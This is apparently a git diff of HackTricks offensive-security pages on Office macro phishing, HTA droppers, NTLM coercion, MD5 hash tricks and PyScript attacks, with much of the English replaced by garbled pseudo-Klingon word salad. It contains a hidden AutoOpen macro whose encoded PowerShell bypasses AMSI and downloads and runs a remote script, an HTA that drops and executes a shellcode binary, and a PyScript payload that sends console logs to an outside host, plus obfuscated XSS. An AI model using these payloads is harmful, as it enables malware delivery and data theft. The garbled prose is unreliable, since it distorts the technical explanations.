![https://0xpatrik.com/content/images/2018/07/cert_listing.png](<../../.gitbook/assets/image (390).png>)
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
![](<../../.gitbook/assets/image (391).png>)
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) that does just that.
### **New domains**
**One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain.
<details> <details>

View file

@ -21,12 +21,12 @@ For example, an RTF file does not support macros, by design, but a DOCM file ren
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.). The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
You can use the following command to check which extensions are going to be executed by some Office programs: You can use the following command to check which extensions are going to be executed by some Office programs:
```bash ```bash
assoc | findstr /i "word excel powerp" assoc | findstr /i "word excel powerp"
``` ```
### Phishing Documents
DOCX files referencing a remote template (File Options Add-ins Manage: Templates Go) that includes macros can “execute” macros as well. #### DOCX files referencing a remote template (File Options Add-ins Manage: Templates Go) that includes macros can “execute” macros as well.
### External Image Load ### External Image Load
@ -47,19 +47,18 @@ The more common they are, the more probable the AV will detect them.
* Document\_Open() * Document\_Open()
#### Macros Code Examples #### Macros Code Examples
```vba ```vba
Sub AutoOpen() Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=") CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub End Sub
``` ```
```vba ```vba
Sub AutoOpen() Sub AutoOpen()
Dim Shell As Object Dim Shell As Object
Set Shell = CreateObject("wscript.shell") Set Shell = CreateObject("wscript.shell")
Shell.Run "calc" Shell.Run "calc"
End Sub End Sub
``` ```
@ -68,8 +67,8 @@ End Sub
Dim author As String Dim author As String
author = oWB.BuiltinDocumentProperties("Author") author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-") With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author .StdIn.WriteLine author
.StdIn.WriteBlackLines 1 .StdIn.WriteBlackLines 1
``` ```
```vba ```vba
@ -77,88 +76,85 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated> proc.Create "powershell <beacon line generated>
``` ```
#### Manually remove metadata #### Manually remove metadata
Fo to **File > Info > Inspect Document > Inspect Document**, which will bring up the Document Inspector. Click **Inspect** and then **Remove All** next to **Document Properties and Personal Information**. **File > Info > Inspect Document > Inspect Document** laH, Document Inspector jImej. **Inspect** 'ej **Document Properties and Personal Information** DaH **Remove All** 'e' vItlhutlh.
#### Doc Extension #### Doc Extension
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\ Qav, **Save as type** dropdown, **`.docx`** format **Word 97-2003 `.doc`** vItlhutlh.\
Do this because you **can't save macro's inside a `.docx`** and there's a **stigma** **around** the macro-enabled **`.docm`** extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). Therefore, this **legacy `.doc` extension is the best compromise**. vaj **macro's `.docx`** vItlhutlh 'ej **macro-enabled `.docm`** extension (e.g. thumbnail icon 'e' vItlhutlh `!` 'ej web/email gateway vItlhutlh) **stigma** **around** 'e'. So, **legacy `.doc` extension** vItlhutlh.
#### Malicious Macros Generators #### Malicious Macros Generators
* MacOS * MacOS
* [**macphish**](https://github.com/cldrn/macphish) * [**macphish**](https://github.com/cldrn/macphish)
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) * [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
## HTA Files ## HTA Files
An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model. HTA Windows program 'oH **HTML 'ej scripting languages (VBScript 'ej JScript)** **combine**. 'oH "fully trusted" application **user interface** 'ej **execute** 'e' vItlhutlh, browser's security model constraints.
An HTA is executed using **`mshta.exe`**, which is typically **installed** along with **Internet Explorer**, making **`mshta` dependant on IE**. So if it has been uninstalled, HTAs will be unable to execute.
HTA **`mshta.exe`** **execute** vItlhutlh, **Internet Explorer** **installed** typically, **`mshta` IE dependant** vItlhutlh. So, 'oH uninstall, HTAs unable execute.
```html ```html
<--! Basic HTA Execution --> <--! Basic HTA Execution -->
<html> <html>
<head> <head>
<title>Hello World</title> <title>Hello World</title>
</head> </head>
<body> <body>
<h2>Hello World</h2> <h2>Hello World</h2>
<p>This is an HTA...</p> <p>This is an HTA...</p>
</body> </body>
<script language="VBScript"> <script language="VBScript">
Function Pwn() Function Pwn()
Set shell = CreateObject("wscript.Shell") Set shell = CreateObject("wscript.Shell")
shell.run "calc" shell.run "calc"
End Function End Function
Pwn Pwn
</script> </script>
</html> </html>
``` ```
```html ```html
<--! Cobal Strike generated HTA without shellcode --> <--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript"> <script language="VBScript">
Function var_func() Function var_func()
var_shellcode = "<shellcode>" var_shellcode = "<shellcode>"
Dim var_obj Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject") Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream Dim var_stream
Dim var_tempdir Dim var_tempdir
Dim var_tempexe Dim var_tempexe
Dim var_basedir Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2) Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName() var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir) var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe" var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false) Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2 For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2))) var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next Next
var_stream.Close var_stream.Close
Dim var_shell Dim var_shell
Set var_shell = CreateObject("Wscript.Shell") Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe) var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir) var_obj.DeleteFolder(var_basedir)
End Function End Function
var_func var_func
self.close self.close
</script> </script>
``` ```
## Forcing NTLM Authentication ## Forcing NTLM Authentication
There are several ways to **force NTLM authentication "remotely"**, for example, you could add **invisible images** to emails or HTML that the user will access (even HTTP MitM?). Or send the victim the **address of files** that will **trigger** an **authentication** just for **opening the folder.** **Qapla'!** **NTLM authentication "remotely"** **ghItlh** **chel** **'e'** **invisible images** **'ej** **emails** **HTML** **'e'** **'oH** **user** **access** **(HTTP MitM?).** **'ej** **victim** **'oH** **files** **'ej** **'oH** **trigger** **authentication** **'ej** **opening** **folder.**
**Check these ideas and more in the following pages:** **Check** **ideas** **pages** **following:**
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} {% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) [printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
@ -170,7 +166,7 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
### NTLM Relay ### NTLM Relay
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: **Qapla'!** **hash** **authentication** **steal** **'ej** **NTLM relay attacks** **perform** **'ej**:
* [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) * [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
* [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) * [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
@ -179,10 +175,10 @@ Don't forget that you cannot only steal the hash or the authentication but also
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **Qapla'!** **'oH** **work** **cybersecurity company**? **'oH** **want** **company advertised** **HackTricks**? **'ej** **want** **access** **latest version** **PEASS** **download HackTricks** **PDF**? **Check** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Discover** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), **collection** **exclusive NFTs**
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Get** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **'oH** **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. * **'oH** **Share** **hacking tricks** **submitting PRs** **[hacktricks repo](https://github.com/carlospolop/hacktricks)** **[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -13,20 +11,18 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
```python ```python
import hashlib import hashlib
target = '2f2e2e' #/.. target = '2f2e2e' #/..
candidate = 0 candidate = 0
while True: while True:
plaintext = str(candidate) plaintext = str(candidate)
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest() hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
if hash[-1*(len(target)):] == target: #End in target if hash[-1*(len(target)):] == target: #End in target
print('plaintext:"' + plaintext + '", md5:' + hash) print('plaintext:"' + plaintext + '", md5:' + hash)
break break
candidate = candidate + 1 candidate = candidate + 1
``` ```
```python ```python
@ -36,41 +32,38 @@ from multiprocessing import Process, Queue, cpu_count
def loose_comparison(queue, num): def loose_comparison(queue, num):
target = '0e' target = '0e'
plaintext = f"a_prefix{str(num)}a_suffix" plaintext = f"a_prefix{str(num)}a_suffix"
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest() hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]): if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
print('plaintext: ' + plaintext + ', md5: ' + hash) print('plaintext: ' + plaintext + ', md5: ' + hash)
queue.put("done") # triggers program exit queue.put("done") # triggers program exit
def worker(queue, thread_i, threads): def worker(queue, thread_i, threads):
for num in range(thread_i, 100**50, threads): for num in range(thread_i, 100**50, threads):
loose_comparison(queue, num) loose_comparison(queue, num)
def main(): def main():
procs = [] procs = []
queue = Queue() queue = Queue()
threads = cpu_count() # 2 threads = cpu_count() # 2
for thread_i in range(threads): for thread_i in range(threads):
proc = Process(target=worker, args=(queue, thread_i, threads )) proc = Process(target=worker, args=(queue, thread_i, threads ))
proc.daemon = True # kill all subprocess when main process exits. proc.daemon = True # kill all subprocess when main process exits.
procs.append(proc) procs.append(proc)
proc.start() proc.start()
while queue.empty(): # exits when a subprocess is done while queue.empty(): # exits when a subprocess is done
pass pass
return 0 return 0
main() main()
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh zero to hero</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -81,5 +74,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -16,22 +16,20 @@ Other ways to support HackTricks:
## PyScript Pentesting Guide ## PyScript Pentesting Guide
PyScript is a new framework developed for integrating Python into HTML so, it can be used alongside HTML. In this cheat sheet, you'll find how to use PyScript for your penetration testing purposes. PyScript jup'a'wI' 'e' vItlhutlh Python HTML vItlhutlh. vaj PyScript vItlhutlh, penetration testing purposes vItlhutlh.
### Dumping / Retrieving files from the Emscripten virtual memory filesystem: ### Emscripten virtual memory filesystem laH 'ej DaH 'e' vItlhutlh:
`CVE ID: CVE-2022-30286`\ `CVE ID: CVE-2022-30286`\
\ \
Code: Code:
```html ```html
<py-script> <py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read() out = fin.read()
print(out) print(out)
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png) ![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
@ -41,18 +39,16 @@ Result:
`CVE ID: CVE-2022-30286`\ `CVE ID: CVE-2022-30286`\
\ \
Code: Code:
```html ```html
<py-script> <py-script>
x = "CyberGuy" x = "CyberGuy"
if x == "CyberGuy": if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output: with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read() contents = output.read()
print(contents) print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>') print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png) ![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
@ -60,13 +56,11 @@ Result:
### Cross Site Scripting (Ordinary) ### Cross Site Scripting (Ordinary)
Code: Code:
```python ```python
<py-script> <py-script>
print("<img src=x onerror='alert(document.domain)'>") print("<img src=x onerror='alert(document.domain)'>")
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png) ![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
@ -74,7 +68,6 @@ Result:
### Cross Site Scripting (Python Obfuscated) ### Cross Site Scripting (Python Obfuscated)
Code: Code:
```python ```python
<py-script> <py-script>
sur = "\u0027al";fur = "e";rt = "rt" sur = "\u0027al";fur = "e";rt = "rt"
@ -86,7 +79,6 @@ y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p) print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png) ![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
@ -94,13 +86,11 @@ Result:
### Cross Site Scripting (JavaScript Obfuscation) ### Cross Site Scripting (JavaScript Obfuscation)
Code: Code:
```html ```html
<py-script> <py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>") prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png) ![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
@ -108,14 +98,12 @@ Result:
### DoS attack (Infinity loop) ### DoS attack (Infinity loop)
Code: Code:
```html ```html
<py-script> <py-script>
while True: while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;") print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script> </py-script>
``` ```
Result: Result:
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)

File diff suppressed because one or more lines are too long

View file

@ -21,7 +21,6 @@ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=ba
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
```bash ```bash
sudo apt-get install python3-venv sudo apt-get install python3-venv
#Now, go to the folder you want to create the virtual environment #Now, go to the folder you want to create the virtual environment
@ -40,11 +39,10 @@ is fixed running
pip3 install wheel pip3 install wheel
inside the virtual environment inside the virtual environment
``` ```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) vIghoSlaHbe'chugh **automate workflows** je powered by the world's **most advanced** community tools.\
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

View file

@ -23,7 +23,6 @@ Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Python Requests ## Python Requests
```python ```python
import requests import requests
@ -67,64 +66,93 @@ proxies = {}
s = requests.Session() s = requests.Session()
def register(username, password): def register(username, password):
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0) resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
return resp return resp
def login(username, password): def login(username, password):
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0) resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
return resp return resp
def get_info(name): def get_info(name):
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0) resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1] guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
return guid return guid
def upload(guid, filename, data): def upload(guid, filename, data):
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0) resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1] guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
return guid return guid
def json_search(guid, search_string): def json_search(guid, search_string):
